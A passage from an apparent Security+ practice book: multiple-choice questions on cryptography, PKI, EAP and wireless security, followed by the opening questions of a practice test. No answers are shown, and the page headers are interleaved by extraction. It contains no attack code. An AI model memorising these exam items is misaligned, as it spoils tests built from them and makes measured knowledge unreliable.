- of “good,” “revoked,” or “unknown”?
- A. CRL
- B. OSCP
- C. RA
- D. PKI
- 13. Which of the following symmetric key algorithms are block ciphers? (Choose two.)
- A. MD5
- B. 3DES
- C. RC4
- D. Blowfish
- 14. Which of the following encryption algorithms is the weakest?
- A. Blowfish
- B. AES
- C. DES
- D. SHA
- 15. What encryption protocol does WEP improperly use?
- A. RC6
- B. RC4
- C. AES
- D. DES
- 16. James, an IT manager, expresses a concern during a monthly meeting about weak user
- passwords used on company servers and how they may be susceptible to brute-force
- password attacks. Which concept can James implement to make the weak passwords
- stronger?
- A. Key stretching
- B. Key escrow
- C. Key strength
- D. ECC
- 17. You are installing a network for a small business named Matrix Interior Design that the
- owner is operating out of their home. There are only four devices that will use the wireless
- LAN, and you are installing a SOHO wireless router between the wireless LAN clients
- and the broadband connection. To ensure better security from outside threats connecting
- to the wireless SOHO router, which of the following would be a good choice for the
- WPA2-PSK passphrase?
- A. 123456
- B.
- XXrcERr6Euex9pRCdn3h3Chapter 6
- C. bRtlBv
- D. HomeBusiness
- ■
- Cryptography and PKI
- 171
- 18. You set up your wireless SOHO router to encrypt wireless traffic, and you configure the
- router to require wireless clients to authenticate against a RADIUS server. What type of
- security have you configured?
- A. WPA2 Enterprise
- B. WPA2 Personal
- C. TKIP
- D. WEP
- 19. You must implement a cryptography system that applies encryption to a group of data at a
- time. Which of the following would you choose?
- A. Stream
- B. Block
- C. Asymmetric
- D. Symmetric
- 20. Which symmetric block cipher supersedes Blowfish?
- A. RSA
- B. Twofish
- C. MD5
- D. PBKDF2
- 21. Root CAs can delegate their authority to which of the following to issue certificates to
- users?
- A. Registered authorities
- B. Intermediate CAs
- C. CRL
- D. CSR
- 22. Which of the following protocols should be used to authenticate remote access users with
- smartcards?
- A. PEAP
- B. EAP-TLS
- C. CHAP
- D. MS-CHAPv2
- 23. Tom is sending Mary a document and wants to show the document came from him.
- Which of the following should Tom use to digitally sign the document?
- A. TKIP
- B. Intermediate CA
- C. Public key
- D. Private keyChapter 6
- 172
- ■
- Cryptography and PKI
- 24. Which of the following EAP types offers support for legacy authentication protocols such
- as PAP, CHAP, MS-CHAP, or MS-CHAPv2?
- A. PEAP
- B. EAP-FAST
- C. EAP-TLS
- D. EAP-TTLS
- 25. You are conducting a training program for new network administrators for your
- company. You talk about the benefits of asymmetric encryption. Which of the following
- are considered asymmetric algorithms? (Choose two.)
- A. RC4
- B. DES
- C. RSA
- D. ECC
- 26. Which of the following is a form of encryption also known as ROT13?
- A. Substitution cipher
- B. Transposition cipher
- C. Diffusion
- D. Confusion
- 27. Matt needs to calculate the number of keys that must be generated for 480 employees
- using the company’s PKI asymmetric algorithm. How many keys must Matt create?
- A. 114,960
- B. 480
- C. 960
- D. 229,920
- 28. You are conducting a one-time electronic transaction with another company. The transac-
- tion needs to be encrypted, and for efficiency and simplicity, you want to use a single key
- for encryption and decryption of the data. Which of the following types would you use?
- A. Asymmetric
- B. Symmetric
- C. Hashing
- D. Steganography
- 29. Which of the following uses two mathematically related keys to secure data during
- transmission?
- A. Twofish
- B. 3DES
- C. RC4
- D. RSAChapter 6
- ■
- Cryptography and PKI
- 173
- 30. You have been instructed by the security manager to protect the server’s data-at-rest.
- Which of the following would provide the strongest protection?
- A. Implement a full-disk encryption system.
- B. Implement biometric controls on data entry points.
- C. Implement a host-based intrusion detection system.
- D. Implement a host-based intrusion prevention system.
- 31. Which of the following EAP types use a three-phase operation?
- A. EAP-FAST
- B. EAP-TLS
- C. EAP-TTLS
- D. PEAP
- 32. Which of the following is an encryption standard that uses a single 56-bit symmetric key?
- A. DES
- B. 3DES
- C. AES
- D. WPS
- 33. Which of the following cryptography concepts converts output data into a fixed-length
- value and cannot be reversed?
- A. Steganography
- B. Hashing
- C. Collision
- D. IV
- 34. SSL is a protocol used for securing transactions transmitting over an untrusted network
- such as the Internet. Which of the following best describes the action that occurs during
- the SSL connection setup process?
- A. The client creates a session key and encrypts it with the server’s private key.
- B. The client creates a session key and encrypts it with the server’s public key.
- C. The server creates a session key and encrypts it with the client’s private key.
- D. The server creates a session key and encrypts it with the client’s public key.
- 35. Which of the following EAP types requires both server and client certificates?
- A. EAP-FAST
- B. PEAP
- C. EAP-TLS
- D. EAP-TTLSChapter 6
- 174
- ■
- Cryptography and PKI
- 36. You are the network administrator for a small office of 35 users and need to utilize mail
- encryption that will allow specific users to encrypt outgoing email messages. You are
- looking for an inexpensive onsite encryption server. Which of the following would you
- implement?
- A. PGP/GPG
- B. WPA2
- C. CRL
- D. EAP-TLS
- 37. You have been promoted to security administrator for your company and you need to be
- aware of all types of hashing algorithms for integrity checks. Which algorithm offers a
- 160-bit digest?
- A. MD5
- B. RC4
- C. SHA-1
- D. AES
- 38. You are the security manager for your company, and a system administrator wants to
- know if there is a way to reduce the cost of certificates by purchasing a certificate to cover
- all domains and subdomains for the company. Which of the following solutions would
- you offer?
- A. Wildcards
- B. Object identifiers
- C. Key escrow
- D. OCSP
- 39. Which of the following are authentication protocols? (Choose two.)
- A. WPS
- B. EAP
- C. IPSec
- D. IEEE 802.1x
- 40. Your company is looking to accept electronic orders from a vendor and wants to ensure
- nonauthorized people cannot send orders. Your manager wants a solution that provides
- nonrepudiation. Which of the following options would meet the requirements?
- A. Digital signatures
- B. Hashes
- C. Steganography
- D. Perfect forward secrecy
- 41. You are tasked to implement a solution to ensure data that are stored on a removable USB
- drive hasn’t been tampered with. Which of the following would you implement?
- A. Key escrow
- B.
- File backupChapter 6
- C. File encryption
- D. File hashing
- ■
- Cryptography and PKI
- 175
- 42. Which of the following is mainly used for remote access into a network?
- A. TACACS+
- B. XTACACS
- C. Kerberos
- D. RADIUS
- 43. A security manager has asked you to explain why encryption is important and what
- symmetric encryption offers. Which of the following is the best explanation?
- A. Confidentiality
- B. Nonrepudiation
- C. Steganography
- D. Collision
- 44. You are a security administrator and have discovered one of the employees has been
- encoding confidential information into graphic files. Your employee is sharing these pic-
- tures on their social media account. What concept was the employee using?
- A. Hashing
- B. Steganography
- C. Symmetric algorithm
- D. Asymmetric algorithm
- 45. Your company’s branch offices connect to the main office through a VPN. You recently
- discovered the key used on the VPN has been compromised. What should you do to
- ensure the key isn’t compromised in the future?
- A. Enable perfect forward secrecy at the main office and branch office ends of the VPN.
- B. Enable perfect forward secrecy at the main office end of the VPN.
- C. Enable perfect forward secrecy at the branch office end of the VPN.
- D. Disable perfect forward secrecy at the main office and branch office ends of the VPN.
- 46. You are configuring your friend’s new wireless SOHO router and discover a PIN on the
- back of the router. Which of the following best describes the purpose of the PIN?
- A. This is a WEP PIN.
- B. This is a WPS PIN.
- C. This is a WPA PIN.
- D. This is a Bluetooth PIN.
- 47. Which of the following benefits do digital signatures provide? (Choose two.)
- A. Nonrepudiation
- B. Authentication
- C. Encryption
- D. Key exchangeChapter 6
- 176
- ■
- Cryptography and PKI
- 48. Your company has asked you to recommend a secure method for password storage. Which
- of the following would provide the best protection against brute-force attacks? (Choose
- two.)
- A. ROT13
- B. MD5
- C. PBKDF2
- D. BCRYPT
- 49. Your IT support center is receiving a high number of calls stating that users trying to
- access the company’s website are receiving certificate errors within their browsers. Which
- of the following statements best describes what the issue is?
- A. The website certificate has expired.
- B. Users have forgotten their usernames or passwords.
- C. The domain name has expired.
- D. The network is currently unavailable.
- 50. In asymmetric encryption, what is used to decrypt an encrypted file?
- A. Private key
- B. Public key
- C. Message digest
- D. Ciphertext
- 51. You are performing a vulnerability assessment on a company’s LAN and determine they
- are using 802.1x for secure access. Which of the following attacks can a threat actor use
- to bypass the network security?
- A. MAC spoofing
- B. ARP poisoning
- C. Ping of death
- D. Xmas attack
- 52. Your security manager is looking to implement a one-time pad scheme for the company’s
- salespeople to use when traveling. Which of the following best describes a requirement for
- this implementation? (Choose three.)
- A. The pad must be distributed securely and protected at its destination.
- B. The pad must always be the same length.
- C. The pad must be used only one time.
- D. The pad must be made up of truly random values.
- 53. A threat actor has created a man-in-the-middle attack and captured encrypted communi-
- cation between two users. The threat actor was unable to decrypt the messages. Which of
- the following is the reason the threat actor is unable to decrypt the messages?
- A. Hashing
- B.
- Symmetric encryptionChapter 6
- C. Asymmetric encryption
- D. Key escrow
- ■
- Cryptography and PKI
- 177
- 54. You have implemented a PKI to send signed and encrypted data. The user sending data
- must have which of the following? (Choose two.)
- A. The receiver’s private key
- B. The sender’s private key
- C. The sender’s public key
- D. The receiver’s public key
- 55. Which of the following best describes the drawback of symmetric key systems?
- A. You must use different keys for encryption and decryption.
- B. The algorithm is more complex.
- C. The system works much more slowly than an asymmetric system.
- D. The key must be delivered in a secure manner.
- 56. Your company is looking for a secure backup mechanism for key storage in a PKI. Which
- of the following would you recommend?
- A. CSR
- B. Key escrow
- C. CRL
- D. CA
- 57. Which cryptography concept uses points on a curve to define public and private key pairs?
- A. Obfuscation
- B. ECC
- C. Stream cipher
- D. Block cipher
- 58. You are a security administrator and have been given instructions to update the access
- points to provide a more secure connection. The access points are currently set to use
- WPA TKIP for encryption. Which of the following would you configure to accomplish the
- task of providing a more secure connection?
- A. WEP
- B. WPA2 CCMP
- C. Enable MAC filtering
- D. Disable SSID broadcast
- 59. Which of the following is an example of a stream cipher?
- A. AES
- B. DES
- C. 3DES
- D. RC4Chapter 6
- 178
- ■
- Cryptography and PKI
- 60. Which of the following are negotiation protocols commonly used by TLS? (Choose two.)
- A. DHE
- B. ECDHE
- C. RSA
- D. SHA
- 61. Which of the following statements is true regarding symmetric key systems?
- A. They use different keys on each end of the transported data.
- B. They use public key cryptography.
- C. They use multiple keys for creating digital signatures.
- D. They use the same key on each end of the transported data.
- 62. Which of the following ciphers was created from the foundation of the Rijndael
- algorithm?
- A. TKIP
- B. AES
- C. DES
- D. 3DES
- 63. Katelyn is sending an important email to Zackary, the manager of human resources.
- Company policy states messages to human resources must be digitally signed. Which of
- the following statements is correct?
- A. Katelyn’s public key is used to verify the digital signature.
- B. Katelyn’s private key is used to verify the digital signature.
- C. Zackary’s public key is used to verify the digital signature.
- D. Zackary’s private key is used to verify the digital signature.
- 64. Data integrity is provided by which of the following?
- A. 3DES
- B. MD5
- C. AES
- D. Blowfish
- 65. Which of the following is a symmetric encryption algorithm that is available in 128-bit,
- 192-bit, and 256-bit key versions?
- A. AES
- B. DES
- C. RSA
- D. TKIPChapter 6
- ■
- Cryptography and PKI
- 179
- 66. Which of the following items are found within a digital certificate? (Choose two.)
- A. Serial number
- B. Default gateway
- C. Public key
- D. Session key
- 67. In an 802.1x implementation, which of the following devices mutually authenticate with
- each other? (Choose two.)
- A. Authentication server
- B. Certificate authority
- C. Domain controller
- D. Supplicant
- 68. Which of the following statements is true regarding the confusion encryption method?
- A. It puts one item in the place of another; for example, one letter for another or one
- letter for a number.
- B. It scrambles data by reordering the plain text in a certain way.
- C. It uses a relationship between the plain text and the key that is so complicated the
- plain text can’t be altered and the key can’t be determined.
- D. Change in the plain text will result in multiple changes that are spread throughout
- the cipher text.
- 69. Which of the following is required when employing PKI and preserving data is important?
- A. CA
- B. CRL
- C. Key escrow
- D. CER
- 70. You need to encrypt the signature of an email within a PKI system. Which of the follow-
- ing would you use?
- A. CER
- B. Public key
- C. Shared key
- D. Private key
- 71. Which of the following standards was developed by the Wi-Fi Alliance and implements
- the requirements of IEEE 802.11i?
- A. NIC
- B. WPA
- C. WPA2
- D. TKIPChapter 6
- 180
- ■
- Cryptography and PKI
- 72. You are asked to create a wireless network for your company that implements a wire-
- less protocol that provides maximum security while providing support for older wireless
- devices. Which protocol should you use?
- A. WPA
- B. WPA2
- C. WEP
- D. IV
- 73. Bob is a security administrator and needs to encrypt and authenticate messages that are
- sent and received between two systems. Which of the following would Bob choose to
- accomplish his task?
- A. Diffie-Hellman
- B. MD5
- C. SHA-256
- D. RSA
- 74. Which of the following algorithms is generally used in mobile devices?
- A. 3DES
- B. DES
- C. ECC
- D. AES
- 75. Which of the following statements best describes the difference between public key
- cryptography and public key infrastructure?
- A. Public key cryptography is another name for an asymmetric algorithm, whereas
- public key infrastructure is another name for a symmetric algorithm.
- B. Public key cryptography uses one key to encrypt and decrypt the data, and public key
- infrastructure uses two keys to encrypt and decrypt the data.
- C. Public key cryptography is another name for asymmetric cryptography, whereas
- public key infrastructure contains the public key cryptographic mechanisms.
- D. Public key cryptography provides authentication and nonrepudiation, whereas public
- key infrastructure provides confidentiality and integrity.
- 76. Your company has a public key infrastructure (PKI) in place to issue digital certificates to
- users. Recently, your company hired temporary contractors for a project that is now com-
- plete. Management has requested that all digital certificates issued to the contractors be
- revoked. Which PKI component would you consult for the management’s request?
- A. CA
- B. CRL
- C. RA
- D. CSRChapter 6
- ■
- Cryptography and PKI
- 181
- 77. Which of the following security setup modes are intended for use in a small office or
- home office environment? (Choose two.)
- A. WPS
- B. WPA-Enterprise
- C. WPA2-Enterprise
- D. WPA2-Personal
- 78. Which of the following automatically updates browsers with a list of root certificates from
- an online source to track which certificates are to be trusted?
- A. Trust model
- B. Key escrow
- C. PKI
- D. RA
- 79. Which of the following EAP types uses the concepts of public key infrastructure (PKI)?
- A. EAP-TLS
- B. PEAP
- C. EAP-FAST
- D. EAP-TTLS
- 80. Which of the following use PSK authentication? (Choose two.)
- A. WPA-Enterprise
- B. WPA-Personal
- C. WPA2-Personal
- D. WPA2-Enterprise
- 81. You are receiving calls from users who are connected to the company’s network and
- are being redirected to a login page with the company’s logo after they type a popular
- social media web address in an Internet browser. Which of the following is causing this to
- happen?
- A. WEP
- B. Key stretching
- C. MAC filtering
- D. Captive portal
- 82. Elliptic curve cryptosystem (ECC) is an asymmetric algorithm. Which of the following
- statements best describe why ECC is different from other asymmetric algorithms?
- (Choose two.)
- A. It is more efficient.
- B. It provides digital signatures, secure key distribution, and encryption.
- C. It uses more processing power to perform encryption.
- D. It provides fast key generation.Chapter 6
- 182
- ■
- Cryptography and PKI
- 83. WEP’s RC4 approach to encryption uses a 24-bit string of characters added to data
- that are transmitted. The same plain text data frame will not appear as the same WEP-
- encrypted data frame. What is this string of characters called?
- A. Diffusion
- B. IV
- C. Session key
- D. Hashing
- 84. Your manager has recently purchased a RADIUS server that will be used by remote
- employees to connect to internal resources. Several client computers need to connect to the
- RADIUS server in a secure manner. What should your manager deploy?
- A. HIDS
- B. UTM
- C. VLAN
- D. 802.1x
- 85. Katelyn, a network administrator, has deleted the account for a user who left the company
- last week. The user’s files were encrypted with a private key. How can Katelyn view the
- user’s files?
- A. The data can be decrypted using the backup user account.
- B. The data can be decrypted using the recovery agent.
- C. She must re-create the former user’s account.
- D. The data can be decrypted using a CRL.
- 86. Your company has recently implemented an encryption system on the network. The sys-
- tem uses a secret key between two parties and must be kept secret. Which system was
- implemented?
- A. Asymmetric algorithm
- B. Symmetric algorithm
- C. Hashing algorithm
- D. Steganography
- 87. Tim, a wireless administrator, has been tasked with securing the company’s WLAN.
- Which of the following cryptographic protocols would Tim use to provide the most secure
- environment for the company?
- A. WPA2 CCMP
- B. WEP
- C. WPA
- D. WPA2 TKIPChapter 6
- ■
- Cryptography and PKI
- 183
- 88. Which of the following defines a hashing algorithm creating the same hash value from
- two different messages?
- A. AES
- B. MD5
- C. Hashing
- D. Collision
- 89. Matt, a network administrator, is deciding which credential-type authentication to
- use within the company’s planned 802.1x deployment. He is searching for a method
- that requires a client certificate and a server-side certificate, and that uses tunnels for
- encryption. Which credential-type authentication method would Matt use?
- A. EAP-TLS
- B. EAP-FAST
- C. PEAP
- D. EAP
- 90. A coworker is connecting to a secure website using HTTPS. The coworker informs you that
- before the website loads, their web browser displays an error indicating that the site certifi-
- cate is invalid and the site is not trusted. Which of the following is most likely the issue?
- A. The web browser is requiring an update.
- B. The server is using a self-signed certificate.
- C. A web proxy is blocking the connection.
- D. The web server is currently unavailable.
- 91. Zack, an administrator, needs to renew a certificate for the company’s web server. Which
- of the following would you recommend Zack submit to the CA?
- A. CSR
- B. Key escrow
- C. CRL
- D. OCSP
- 92. Which of the following types of encryption offers easy key exchange and key management?
- A. Obfuscation
- B. Asymmetric
- C. Symmetric
- D. Hashing
- 93. Which of the following is used to exchange cryptographic keys?
- A. Diffie-Hellman
- B. HMAC
- C. ROT13
- D. RC4Chapter 6
- 184
- ■
- Cryptography and PKI
- 94. Which of the following encryption algorithms is used to encrypt and decrypt data?
- A. MD5
- B. HMAC
- C. Kerberos
- D. RC4
- 95. Which of the following provides additional encryption strength by repeating the encryp-
- tion process with additional keys?
- A. 3DES
- B. AES
- C. Twofish
- D. Blowfish
- 96. Which of the following security mechanisms can be used for the purpose of nonrepudia-
- tion?
- A. Encryption
- B. Digital signature
- C. Collision
- D. CA
- 97. You are a network administrator for your company, and the single AP that allows cli-
- ents to connect to the wireless LAN is configured with a WPA-PSK preshared key of the
- company name followed by the number 1. Which of the following statements is correct
- regarding this implementation?
- A. It is secure because WPA-PSK resolved the problem with WEP.
- B. It is secure because the preshared key is at least five characters long.
- C. It is not secure because the preshared key includes only one number and the company
- name so it can be easily guessed.
- D. It is not secure because WPA-PSK is as insecure as WEP and should never be used.
- 98. You are a security technician and have been given the task to implement a PKI on the
- company’s network. When verifying the validity of a certificate, you want to ensure
- bandwidth isn’t consumed. Which of the following can you implement?
- A. CRL
- B. OCSP
- C. Key escrow
- D. CA
- 99. Which of the following types of device are found in a network that supports Wi-Fi
- Protected Setup (WPS) protocol? (Choose three.)
- A. Registrar
- B. Supplicant
- C. Enrollee
- D. Access PointChapter 6
- ■
- Cryptography and PKI
- 185
- 100. You are a network administrator for a distribution company and the manager wants to
- implement a secure wireless LAN for a BYOD policy. Through research, you determine that
- the company should implement AES encryption and the 802.1x authentication protocol. You
- also determine that too many APs and clients will be installed and you will need to configure
- each one with a preshared key passphrase. Which of the following will meet your needs?
- A. WEP
- B. WPA
- C. WPA2-Personal
- D. WPA2-Enterprise
- 101. The process of deleting data by sending a single erase or clear instruction to an address of
- the nonvolatile memory is an example of securing which of the following?
- A. Data-in-transit
- B. Data-over-the-network
- C. Data-in-use
- D. Data-at-rest
- 102. Which of the following is an authentication service and uses UDP as a transport medium?
- A. TACACS+
- B. RADIUS
- C. LDAP
- D. Kerberos
- 103. Which of the following is true regarding the importance of encryption of data-at-rest for
- sensitive information?
- A. It renders the recovery of data more difficult should the user lose their password.
- B. It allows the user to verify the integrity of the data on the stored device.
- C. It prevents the sensitive data from being accessed after a theft of the physical equipment.
- D. It renders the recovery of data easier should the user lose their password.
- 104. You are a network administrator and your manager has asked you to enable WPA2
- CCMP for wireless clients, along with an encryption to protect the data transmitting
- across the network. Which of the following encryption methods would you use along with
- WPA2 CCMP?
- A. RC4
- B. DES
- C. AES
- D. 3DES
- 105. Which of the following is the least secure hashing algorithm?
- A. MD5
- B. RIPEMD
- C. SHA-1
- D. AESChapter 6
- 186
- ■
- Cryptography and PKI
- 106. Which of the following types of attack sends two different messages using the same hash
- function, causing a collision?
- A. Xmas attack
- B. DoS
- C. Logic bomb
- D. Birthday attack
- 107. Which of the following defines a file format commonly used to store private keys with
- associated public key certificates?
- A. PKCS #1
- B. PKCS #3
- C. PKCS #7
- D. PKCS #12
- 108. Which of the following statements are true regarding ciphers? (Choose two.)
- A. Stream ciphers encrypt fixed sizes of data.
- B. Stream ciphers encrypt data one bit at a time.
- C. Block ciphers encrypt data one bit at a time.
- D. Block ciphers encrypt fixed sizes of data.
- 109. How many effective key sizes of bits does 3DES have? (Choose three.)
- A. 56
- B. 112
- C. 128
- D. 168
- 110. Which of the following statements is true about symmetric algorithms?
- A. They hide data within an image file.
- B. They use one key to encrypt data and another to decrypt data.
- C. They use a single key to encrypt and decrypt data.
- D. They use a single key to create a hashing value.
- 111. The CA is responsible for revoking certificates when necessary. Which of the following
- statements best describes the relationship between a CRL and OSCP?
- A. OCSP is a protocol to submit revoked certificates to a CRL.
- B. CRL is a more streamlined approach to OCSP.
- C. CRL validates a certificate in real time and reports it to the OCSP.
- D. OCSP is a protocol to check the CRL during a certificate validation process.Chapter 6
- ■
- Cryptography and PKI
- 187
- 112. Which of the following takes each bit in a character and is XORed with the corresponding
- bit in the secret key?
- A. ECDHE
- B. PBKDF2
- C. Obfuscation
- D. One-time pad
- 113. Which of the following works similarly to stream ciphers?
- A. One-time pad
- B. RSA
- C. AES
- D. DES
- 114. Your manager wants to implement a security measure to protect sensitive company data
- that reside on the remote salespeople’s laptops should they become lost or stolen. Which
- of the following measures would you implement?
- A. Implement WPS on the laptops.
- B. Set BIOS passwords on the laptops.
- C. Use whole-disk encryption on the laptops.
- D. Use cable locks on the laptops.
- 115. You want to send confidential messages to a friend through email, but you do not have a
- way of encrypting the message. Which of the following methods would help you achieve
- this goal?
- A. AES
- B. Collision
- C. RSA
- D. Steganography
- 116. Which of the following cipher modes uses a feedback-based encryption method to ensure
- that repetitive data result in unique cipher text?
- A. ECB
- B. CBC
- C. GCM
- D. CTM
- 117. Which statement is true regarding the difference between a secure cipher and a secure
- hash?
- A. A secure hash can be reversed; a secure cipher cannot.
- B. A secure cipher can be reversed; a secure hash cannot.
- C. A secure hash produces a variable output for any input size; a secure cipher does not.
- D. A secure cipher produces the same size output for any input size; a hash does not.Chapter 6
- 188
- ■
- Cryptography and PKI
- 118. Which certificate format is typically used on Windows OS machines to import and export
- certificates and private keys?
- A. DER
- B. AES
- C. PEM
- D. PFX
- 119. What is another name for an ephemeral key?
- A. PKI private key
- B. MD5
- C. PKI public key
- D. Session key
- 120. Why would a threat actor use steganography?
- A. To test integrity
- B. To conceal information
- C. To encrypt information
- D. To create a hashing value
- 121. The CIO has instructed you to set up a system where credit card data will be encrypted
- with the most secure symmetric algorithm with the least amount of CPU usage. Which of
- the following algorithms would you choose?
- A. AES
- B. SHA-1
- C. MD5
- D. 3DES
- 122. Which of the following encryption methods is used by RADIUS?
- A. Asymmetric
- B. Symmetric
- C. Elliptic curve
- D. RSA
- 123. When setting up a secure wireless company network, which of the following should you
- avoid?
- A. WPA
- B. WPA2
- C. EAP-TLS
- D. PEAPChapter 6
- ■
- Cryptography and PKI
- 189
- 124. You want to authenticate and log connections from wireless users connecting with
- EAP-TLS. Which of the following should be used?
- A. Kerberos
- B. LDAP
- C. SAML
- D. RADIUS
- 125. Which of the following would be used to allow certain traffic to traverse from a wireless
- network to an internal network?
- A. WPA
- B. WEP
- C. Load balancers
- D. 802.1x
- 126. You are asked to see if several confidential files have changed, and you decide to use an
- algorithm to create message digests for the confidential files. Which algorithm would
- you use?
- A. AES
- B. RC4
- C. Blowfish
- D. SHA-1
- 127. Network data needs to be encrypted, and you are required to select a cipher that will
- encrypt 128 bits at a time before the data are sent across the network. Which of the
- following would you choose?
- A. Stream cipher
- B. Hash algorithm
- C. Block cipher
- D. Obfuscation
- 128. Which of the following are considered cryptographic hash functions? (Choose two.)
- A. AES
- B. MD5
- C. RC4
- D. SHA-256
- 129. A company’s database is beginning to grow, and the data-at-rest are becoming a concern
- with the security administrator. Which of the following is an option to secure the
- data-at-rest?
- A. SSL certificate
- B. Encryption
- C. Hashing
- D. TLS certificateChapter 6
- 190
- ■
- Cryptography and PKI
- 130. Which of the following hardware devices can store keys? (Choose two.)
- A. USB flash drive
- B. Smartcard
- C. PCI expansion card
- D. Cipher lock
- 131. You are a security manager and have been asked to encrypt database system information
- that contains employee social security numbers. You are looking for an encryption stan-
- dard that is fast and secure. Which of the following would you suggest to accomplish the
- requirements?
- A. SHA-256
- B. AES
- C. RSA
- D. MD5
- 132. James is a security administrator and wants to ensure the validity of public trusted certifi-
- cates used by the company’s web server, even if there is an Internet outage. Which of the
- following should James implement?
- A. Key escrow
- B. Recovery agent
- C. OCSP
- D. CSR
- 133. You are a security administrator looking to implement a two-way trust model. Which of
- the following would you use?
- A. ROT13
- B. PGP
- C. WPA2
- D. PKI
- 134. If a threat actor obtains an SSL private key, what type of attack can be performed?
- (Choose two.)
- A. Eavesdropping
- B. Man-in-the-middle
- C. Social engineering
- D. Brute force
- 135. Most authentication systems make use of a one-way encryption process. Which of the
- following is an example of a one-way encryption?
- A. Symmetric algorithm
- B.
- HashingChapter 6
- C. Asymmetric algorithm
- D. PKI
- ■
- Cryptography and PKI
- 136. Which of the following transpires in a PKI environment?
- A. The CA signs the certificate.
- B. The RA signs the certificate.
- C. The RA creates the certificate and the CA signs it.
- D. The CA creates the certificate and the RA signs it.
- 137. Which of the following statements best describes how a digital signature is created?
- A. The sender encrypts a message digest with the receiver’s public key.
- B. The sender encrypts a message digest with the receiver’s private key.
- C. The sender encrypts a message digest with his or her private key.
- D. The sender encrypts a message digest with his or her public key.
- 138. AES is an algorithm used for which of the following?
- A. Encrypting a large amount of data
- B. Encrypting a small amount of data
- C. Key recovery
- D. Key revocation
- 139. PEAP protects authentication transfers by implementing which of the following?
- A. TLS tunnels
- B. SSL tunnels
- C. AES
- D. SHA hashes
- 140. AES-CCMP uses a 128-bit temporal key and encrypts data in what block size?
- A. 256
- 141.
- B. 192
- C. 128
- D. 64
- Which of the following implement Message Integrity Code (MIC)? (Choose two.)
- A. AES
- B. DES
- C. CCMP
- D. TKIP
- 191Chapter 6
- 192
- ■
- Cryptography and PKI
- 142. James, a WLAN security engineer, recommends to management that WPA-Personal secu-
- rity should not be deployed within the company’s WLAN for their vendors. Which of the
- following statements best describe James’s recommendation? (Choose two.)
- A. Static preshared passphrases are susceptible to social engineering attacks.
- B. WPA-Personal uses public key encryption.
- C. WPA-Personal uses a weak TKIP encryption.
- D. WPA-Personal uses a RADIUS authentication server.
- 143. Which of the following is correct regarding root certificates?
- A. Root certificates never expire.
- B. A root certificate contains the public key of the CA.
- C. A root certificate contains information about the user.
- D. A root certificate cannot be used to authorize subordinate CAs to issue certificates on
- its behalf.
- 144. Which of the following statements are correct about public and private key pairs?
- (Choose two.)
- A. Public and private keys work in isolation of each other.
- B. Public and private keys work in conjunction with each other as a team.
- C. If the public key encrypts the data using an asymmetric encryption algorithm, the
- corresponding private key is used to decrypt the data.
- D. If the private key encrypts the data using an asymmetric encryption algorithm, the
- receiver uses the same private key to decrypt the data.
- 145. Which of the following are the filename extensions for PKCS #12 files? (Choose two.)
- A. .p12
- B. .KEY
- C. .pfx
- D. .p7b
- 146. Your company has discovered that several confidential messages have been intercepted.
- You decide to implement a web of trust to encrypt the files. Which of the following are
- used in a web of trust concept? (Choose two.)
- A. RC4
- B. AES
- C. PGP
- D. GPG
- 147. Which of the following algorithms is typically used to encrypt data-at-rest?
- A. Symmetric
- B. Asymmetric
- C. Stream
- D. HashingChapter 6
- ■
- Cryptography and PKI
- 193
- 148. Which of the following can assist in the workload of the CA by performing identification
- and authentication of users requesting certificates?
- A. Root CA
- B. Intermediate CA
- C. Registered authority
- D. OSCP
- 149. You recently upgraded your wireless network so that your devices will use the 802.11n
- protocol. You want to ensure all communication on the wireless network is secure with
- the strongest encryption. Which of the following is the best choice?
- A. WEP
- B. WPA
- C. WPA2
- D. WPS
- 150. A college wants to move data to a USB flash drive and has asked you to suggest a way to
- secure the data in a quick manner. Which of the following would you suggest?
- A. 3DES
- B. SHA-256
- C. AES-256
- D. SHA-512Chapter
- 7
- Practice TestChapter 7
- 196
- ■
- Practice Test
- 1. You are asked to separate the Sales and Marketing department’s network traffic on a
- layer 2 device within a LAN. This will reduce broadcast traffic and prevent the depart-
- ments from seeing each other’s resources. Which of the following types of network design
- would be the best choice?
- A. MAC
- B. NAT
- C. VLAN
- D. DMZ
- 2. You are a network administrator and your company has asked you to perform a survey of
- the campus for open Wi-Fi access points. You walk around with your smartphone look-
- ing for unsecured access points that you can connect to without a password. What type of
- penetration testing concept is this called?
- A. Escalation of privilege
- B. Active reconnaissance
- C. Passive reconnaissance
- D. Black-box
- 3. Which of the following is a certificate-based authentication that allows individuals access
- to U.S. federal resources and facilities?
- A. Proximity card
- B. TOTP
- C. PIV card
- D. HOTP
- 4. You attempt to log into your company’s network with a laptop. The laptop is quarantined
- to a restricted VLAN until the laptop’s virus definitions are updated. Which of the follow-
- ing best describes this network component?
- A. NAT
- B. HIPS
- C. DMZ
- D. NAC
- 5. You have been asked to implement a security control that will limit tailgating in high-
- secured areas. Which of the following security control would you choose?
- A. Mantrap
- B. Faraday cage
- C. Airgap
- D. Cable locks
- 6. Your company’s network administrator is placing an Internet web server in an isolated
- area of the company’s network for security purposes. Which of the following architecture
- concepts is the network administrator implementing?
- A. Honeynet
- B.
- DMZChapter 7
- C. Proxy
- D. Intranet
- ■
- Practice Test
- 197
- 7. Your company is offering a new product on its website. You are asked to ensure availabil-
- ity of the web server when it receives a large number of requests. Which of the following
- would be the best option to fulfill this request?
- A. VPN concentrator
- B. NIPS
- C. SIEM
- D. Load balancer
- 8. You are a security administrator for a manufacturing company that produces com-
- pounded medications. To ensure individuals are not accessing sensitive areas where the
- medications are created, you want to implement a physical security control. Which of the
- following would be the best option?
- A. Security guard
- B. Signs
- C. Faraday cage
- D. Cameras
- 9. An attacker exploited a bug, unknown to the developer, to gain access to a database
- server. Which of the following best describes this type of attack?
- A. Zero-day
- B. Cross-site scripting
- C. ARP poisoning
- D. Domain hijacking
- 10. A new employee added network drops to a new section of the company’s building. The
- cables were placed across several fluorescent lights. When users attempted to connect to
- the data center on the network, they experienced intermittent connectivity. Which of the
- following environmental controls was the most likely cause of this issue?
- A. DMZ
- B. EMI
- C. BIOS
- D. TPM
- 11. What method should you choose to authenticate a remote workstation before it gains
- access to a local LAN?
- A. Router
- B. Proxy server
- C. VPN concentrator
- D. FirewallChapter 7
- 198
- ■
- Practice Test
- 12. Which of the following allows a company to store a cryptographic key with a trusted
- third party and release it only to the sender or receiver with proper authorization?
- A. CRL
- B. Key escrow
- C. Trust model
- D. Intermediate CA
- 13. Your company recently upgraded the HVAC system for its server room. Which of the fol-
- lowing security implications would the company be most concerned about?
- A. Confidentiality
- B. Availability
- C. Integrity
- D. Airgap
